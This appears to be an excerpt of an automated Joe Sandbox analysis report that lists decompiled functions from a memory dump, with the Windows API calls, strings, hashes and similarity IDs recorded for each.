                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction ID: ff2be9caf160186f6ce8a7490d728cbdd6b7249022c229e29fcd2b47229f1b30
                                                  • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction Fuzzy Hash: 29711876A40757ABD714AE6ADC81B6AB3E8EF14760F1082B9F514E72C2EB70DD0487D0
                                                  Function 00C22527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22542
                                                  • GetMenuItemInfoW.USER32(00C85890,000000FF,00000000,00000030), ref: 00C225A3
                                                  • SetMenuItemInfoW.USER32(00C85890,00000004,00000000,00000030), ref: 00C225D9
                                                  • Sleep.KERNEL32(000001F4), ref: 00C225EB
                                                  • GetMenuItemCount.USER32(?), ref: 00C2262F
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C2264B
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00C22675
                                                  • GetMenuItemID.USER32(?,?), ref: 00C226BA
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C22700
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22714
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22735
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: f37fd1cd80a81c7db394306dc83ec755a93a3c11fc4eec703d3c2635b29bf8a5
                                                  • Instruction ID: eaa0c4a9230cf6d974f4b7f2315749f13a0e4be7abe392c2f556a3c759421df8
                                                  • Opcode Fuzzy Hash: f37fd1cd80a81c7db394306dc83ec755a93a3c11fc4eec703d3c2635b29bf8a5
                                                  • Instruction Fuzzy Hash: 8861BF75904269BFDB21CF64EC88EBE7BB8FB01304F544069F851A7650DB71AE06DB21
                                                  Function 00C46F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C46FA5
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C46FA8
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C46FCC
                                                  • _memset.LIBCMT ref: 00C46FDD
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C46FEF
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C47067
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: 1f54d7ecd91d90a7e6009852df83acc40d106afe3e9bb6cd8d7f69ad5fae3ddb
                                                  • Instruction ID: 199d0a899f6b952c499e6cbddb7b38d4ace29b83f6fea625d3c761e39759082e
                                                  • Opcode Fuzzy Hash: 1f54d7ecd91d90a7e6009852df83acc40d106afe3e9bb6cd8d7f69ad5fae3ddb
                                                  • Instruction Fuzzy Hash: 5B617A75900208AFDB11DFA4CC81FEE77F8BB09710F10419AFA14AB2A1C771AE45DB94
                                                  Function 00C16B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C16BBF
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00C16C18
                                                  • VariantInit.OLEAUT32(?), ref: 00C16C2A
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C16C4A
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00C16C9D
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C16CB1
                                                  • VariantClear.OLEAUT32(?), ref: 00C16CC6
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00C16CD3
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C16CDC
                                                  • VariantClear.OLEAUT32(?), ref: 00C16CEE
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C16CF9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: e1e053ecfa916f3c4a0a79c396b64ef4d0b4527735eeb8800bfbcde6095a7344
                                                  • Instruction ID: 79d2118f781df0073e4fbe8d421320fb4729c3f76204561653daad99827e4d87
                                                  • Opcode Fuzzy Hash: e1e053ecfa916f3c4a0a79c396b64ef4d0b4527735eeb8800bfbcde6095a7344
                                                  • Instruction Fuzzy Hash: 36414035A001199FCF00DF68D858AEEBBB9FF49354F008069E955A7261DB30AA86DB90
                                                  Function 00C383BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • CoInitialize.OLE32 ref: 00C38403
                                                  • CoUninitialize.OLE32 ref: 00C3840E
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00C52BEC,?), ref: 00C3846E
                                                  • IIDFromString.OLE32(?,?), ref: 00C384E1
                                                  • VariantInit.OLEAUT32(?), ref: 00C3857B
                                                  • VariantClear.OLEAUT32(?), ref: 00C385DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 8954cc9680f94f93bd1453949cd1aec1270aa590ebed174da3aa89a208b303fb
                                                  • Instruction ID: a146a9267f7786dd52a78ccebdb73fbb7c463399afabc7ecd43dafd77f531ef0
                                                  • Opcode Fuzzy Hash: 8954cc9680f94f93bd1453949cd1aec1270aa590ebed174da3aa89a208b303fb
                                                  • Instruction Fuzzy Hash: 2D61DD70618312AFE710DF24C848F6EB7E8AF49754F00485DF9869B291CB70EE48CB92
                                                  Function 00C35732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00C35793
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00C357D8
                                                  • gethostbyname.WSOCK32(?), ref: 00C357E4
                                                  • IcmpCreateFile.IPHLPAPI ref: 00C357F2
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35862
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35878
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C358ED
                                                  • WSACleanup.WSOCK32 ref: 00C358F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 6f8d5dfe6609169674021f5c2c9131f55be9d318b2df9b546c7dae7961751c04
                                                  • Instruction ID: 0547cfd3fbeeee4a1452dd95cc69c7dd6010cb3ff71299e4951192fd3e733e7c
                                                  • Opcode Fuzzy Hash: 6f8d5dfe6609169674021f5c2c9131f55be9d318b2df9b546c7dae7961751c04
                                                  • Instruction Fuzzy Hash: 2F519C31650700DFDB20AF25CC49B6AB7E4EF49720F044969F9A6DB2E1DB30E941DB42
                                                  Function 00C2B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2B4D0
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C2B546
                                                  • GetLastError.KERNEL32 ref: 00C2B550
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00C2B5BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 63d06ca154b39835189603783160499dbb055712b48987964dc6b086df3311bb
                                                  • Instruction ID: a7c40f70d817907657ebff230fe328d2dcda399c7362b4e85b75d36c43429906
                                                  • Opcode Fuzzy Hash: 63d06ca154b39835189603783160499dbb055712b48987964dc6b086df3311bb
                                                  • Instruction Fuzzy Hash: D2319E35A40215AFDB00DBA8D849FAE7BB4FF09300F148079F9159B691DB709E46CB91
                                                  Function 00C18F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C19014
                                                  • GetDlgCtrlID.USER32 ref: 00C1901F
                                                  • GetParent.USER32 ref: 00C1903B
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C1903E
                                                  • GetDlgCtrlID.USER32(?), ref: 00C19047
                                                  • GetParent.USER32(?), ref: 00C19063
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C19066
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: f87d7581128ca8b132c091680313679b89ce244f7cf9fcde79958324bb4d3e33
                                                  • Instruction ID: 642e4526ba1eba39609d2d7a6d632d0d416b9ca147252a34085cee4d4961772b
                                                  • Opcode Fuzzy Hash: f87d7581128ca8b132c091680313679b89ce244f7cf9fcde79958324bb4d3e33
                                                  • Instruction Fuzzy Hash: 3121D374A00108BBDF04ABA0CC95FFEBBB4EF4A310F104169B961972E1DB755959EA20
                                                  Function 00C1907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C190FD
                                                  • GetDlgCtrlID.USER32 ref: 00C19108
                                                  • GetParent.USER32 ref: 00C19124
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C19127
                                                  • GetDlgCtrlID.USER32(?), ref: 00C19130
                                                  • GetParent.USER32(?), ref: 00C1914C
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C1914F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 45545f1380492b4bd11dda2b00bec84be3ef6a2150d80a6af02906336cfeb08b
                                                  • Instruction ID: a5bd9857a79cb80624336a0e3a981646c34b6ff872647cb5cdfbe390867e76bc
                                                  • Opcode Fuzzy Hash: 45545f1380492b4bd11dda2b00bec84be3ef6a2150d80a6af02906336cfeb08b
                                                  • Instruction Fuzzy Hash: 70210774A01108BBDF10ABA0CC85FFEBBB8FF4A300F104069F921972A1DB755995EB20
                                                  Function 00C19163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32 ref: 00C1916F
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00C19184
                                                  • _wcscmp.LIBCMT ref: 00C19196
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C19211
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: 0166640d1efe41b569dddee060746ab48620087c950bfa7b0ae71d72f2abef33
                                                  • Instruction ID: 7db2f059dd6a34e7ebe3c5ac23d01887ecf3d2590803015cc4097c9220af929a
                                                  • Opcode Fuzzy Hash: 0166640d1efe41b569dddee060746ab48620087c950bfa7b0ae71d72f2abef33
                                                  • Instruction Fuzzy Hash: 7E115C3A24830BB9FA102625DC1BEEB37ECDB13720B200176FA14A10E1FF7169917990
                                                  Function 00C388AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C388D7
                                                  • CoInitialize.OLE32(00000000), ref: 00C38904
                                                  • CoUninitialize.OLE32 ref: 00C3890E
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00C38A0E
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C38B3B
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C52C0C), ref: 00C38B6F
                                                  • CoGetObject.OLE32(?,00000000,00C52C0C,?), ref: 00C38B92
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00C38BA5
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C38C25
                                                  • VariantClear.OLEAUT32(?), ref: 00C38C35
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: 15f07b6be0200e037233ac549e6c403c25a484c73ca0cb5edbba744b749604e9
                                                  • Instruction ID: d9a016cc65918b293cc0d61fbdfc4987fd883ca00e2718dd2be91f1471fc2f2b
                                                  • Opcode Fuzzy Hash: 15f07b6be0200e037233ac549e6c403c25a484c73ca0cb5edbba744b749604e9
                                                  • Instruction Fuzzy Hash: 69C157B1618305AFD700DF24C884A2BB7E9FF89348F00496DF9999B251DB71ED4ACB52
                                                  Function 00C27990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C27A6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ArraySafeVartype
                                                  • String ID:
                                                  • API String ID: 1725837607-0
                                                  • Opcode ID: 081cb824a358f714093e65ba9d420231b11394682dd0196d2ca7a20ba5cbe6c5
                                                  • Instruction ID: 915a58da0d516aa562c6d334cab888bdb95a337cc7cd25c5a16f1d2becbe602e
                                                  • Opcode Fuzzy Hash: 081cb824a358f714093e65ba9d420231b11394682dd0196d2ca7a20ba5cbe6c5
                                                  • Instruction Fuzzy Hash: 02B18C7590822A9FDB00DFA5E8C5BBEB7F4FF09321F204569E911E7641D734A981CB90
                                                  Function 00C211CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C211F0
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C21204
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00C2120B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20268,?,00000001), ref: 00C2121A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C2122C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20268,?,00000001), ref: 00C21245
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20268,?,00000001), ref: 00C21257
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C2129C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C212B1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C212BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: 8909189b702e9c14ad49d2a2eca529283bed2434c8f8e920c11bc38f04e35d2c
                                                  • Instruction ID: 9666459ac84e027a099a52aa173ccb31778d03ffa6aba2c630f4993c8ebfafc7
                                                  • Opcode Fuzzy Hash: 8909189b702e9c14ad49d2a2eca529283bed2434c8f8e920c11bc38f04e35d2c
                                                  • Instruction Fuzzy Hash: 4D31BD79600214FBEB109F94FC88BAE77A9EB65311F254129FE10CA5A0D7B49F40CB65
                                                  Function 00BFBDA2 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00BC2231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00BC223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00BC2250
                                                  • GetStockObject.GDI32(00000005), ref: 00BC2258
                                                  • GetClientRect.USER32(?), ref: 00BFBDBB
                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BFBDD2
                                                  • GetWindowDC.USER32(?), ref: 00BFBDDE
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00BFBDED
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFBDFF
                                                  • GetSysColor.USER32(00000005), ref: 00BFBE1D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                  • String ID:
                                                  • API String ID: 3430376129-0
                                                  • Opcode ID: 7aacb846f20265327b617c9c5ed9e4a833a71f674eade13dacc65e0cc1cfcbee
                                                  • Instruction ID: 8d2219d752a455e17acb1409938f4855da8190c1b715f15303268ae0c69e7ca5
                                                  • Opcode Fuzzy Hash: 7aacb846f20265327b617c9c5ed9e4a833a71f674eade13dacc65e0cc1cfcbee
                                                  • Instruction Fuzzy Hash: F421E735500205EFDB216FA4EC48FED7BB1FB0A321F1142A9FA25990A1CB714952EF11
                                                  Function 00BCFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BCFAA6
